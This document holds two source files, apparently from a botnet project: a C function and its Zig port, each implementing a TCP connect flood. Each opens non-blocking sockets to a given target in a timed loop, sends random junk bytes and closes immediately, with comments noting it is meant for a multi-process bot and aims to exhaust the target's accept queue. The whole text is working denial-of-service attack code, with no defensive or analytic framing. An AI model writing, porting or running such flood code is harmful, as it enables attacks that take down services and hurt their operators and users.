File: crates/nodes/cloud/modules/attack/methods/socket.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <time.h>
#include <fcntl.h>
#include <errno.h>

#include "attack.h"

// TCP Connect Flood (Socket Resource Exhaustion)
// Layer 4/7 hybrid. Opens real connections.
void attack_socket(uint32_t ip, uint16_t port, uint32_t duration) {
    struct sockaddr_in dest;
    dest.sin_family = AF_INET;
    dest.sin_port = htons(port);
    dest.sin_addr.s_addr = ip;

    time_t end_time = time(NULL) + duration;
    
    // We want to open many sockets, but we are limited by ulimit if single process.
    // In multi-process bot, this works better.
    // Logic: Connect -> Send Garbage -> Close (or keep open if Slowloris).
    // This looks like a Connection Flood.
    
    while (time(NULL) < end_time) {
        int sock = socket(AF_INET, SOCK_STREAM, 0);
        if (sock < 0) continue;

        // Non-blocking connect to fast fail
        fcntl(sock, F_SETFL, O_NONBLOCK);
        
        connect(sock, (struct sockaddr *)&dest, sizeof(dest));
        
        // Wait briefly or check status?
        // For flooding, we just spam connect() calls. 
        // If we reach FD limit, we close old ones.
        
        // Actually, just sending a bit of data helps legitimate it.
        // If EINPROGRESS, we assume it's handshaking.
        
        // Garbage Payload
        char junk[32];
        *(uint32_t*)junk = fast_rand();
        send(sock, junk, sizeof(junk), MSG_NOSIGNAL);
        
        // Close immediately? Or wait? 
        // Aggressive closing (TIME_WAIT stress) or Keep Open (Ram stress).
        // Let's do rapid close to stress accept queue.
        close(sock);
    }
}

File: crates/nodes/cloud/src/attack/socket.zig
//! # TCP Socket Flood (Connect Flood)
//!
//! Opens real TCP connections to exhaust server resources.
//!
//! ## C Reference: modules/attack/methods/socket.c (57 lines)

const std = @import("std");
const posix = std.posix;
const crypto = @import("../crypto/mod.zig");

// ============================================================
// TCP SOCKET FLOOD (from C: socket.c attack_socket lines 17-56)
// ============================================================
// Opens real connections, sends garbage, closes rapidly.
// Stresses accept queue and causes TIME_WAIT buildup.

pub fn attackSocket(ip: u32, port: u16, duration: u32) void {
    const end_time = std.time.timestamp() + duration;
    var rng = crypto.FastRandom.init(@truncate(@as(u64, @bitCast(std.time.timestamp()))));

    while (std.time.timestamp() < end_time) {
        // Create socket (from C: line 31)
        const sock = posix.socket(posix.AF.INET, posix.SOCK.STREAM, 0) catch continue;

        // Non-blocking (from C: line 35)
        const flags = posix.fcntl(sock, posix.F.GETFL, 0) catch {
            posix.close(sock);
            continue;
        };
        _ = posix.fcntl(sock, posix.F.SETFL, flags | @as(u32, @bitCast(posix.O{ .NONBLOCK = true }))) catch {
            posix.close(sock);
            continue;
        };

        // Connect (from C: line 37)
        var dest: posix.sockaddr.in = .{
            .family = posix.AF.INET,
            .port = std.mem.nativeToBig(u16, port),
            .addr = ip,
        };
        _ = posix.connect(sock, @ptrCast(&dest), @sizeOf(posix.sockaddr.in)) catch {};

        // Send garbage payload (from C: lines 47-49)
        var junk: [32]u8 = undefined;
        std.mem.writeInt(u32, junk[0..4], rng.next(), .little);
        std.mem.writeInt(u32, junk[4..8], rng.next(), .little);
        _ = posix.send(sock, &junk, posix.MSG.NOSIGNAL) catch {};

        // Close immediately (from C: line 54)
        // Aggressive closing causes TIME_WAIT stress
        posix.close(sock);
    }
}
